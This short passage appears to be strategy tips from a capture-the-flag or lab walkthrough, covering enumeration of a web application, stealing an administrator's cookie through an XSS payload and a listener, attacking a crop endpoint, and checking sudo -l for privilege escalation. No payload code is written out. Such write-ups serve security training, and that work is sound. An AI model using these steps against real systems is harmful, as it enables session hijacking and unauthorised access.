A key strategy is thorough enumeration of the web application’s features, especially anything an administrator is likely to read. Start your listener before you submit the XSS payload, copy the captured cookie in full, and read api_edit.py carefully before attacking the crop endpoint. For privilege escalation, always check sudo -l first and read the help output of any custom binary it allows.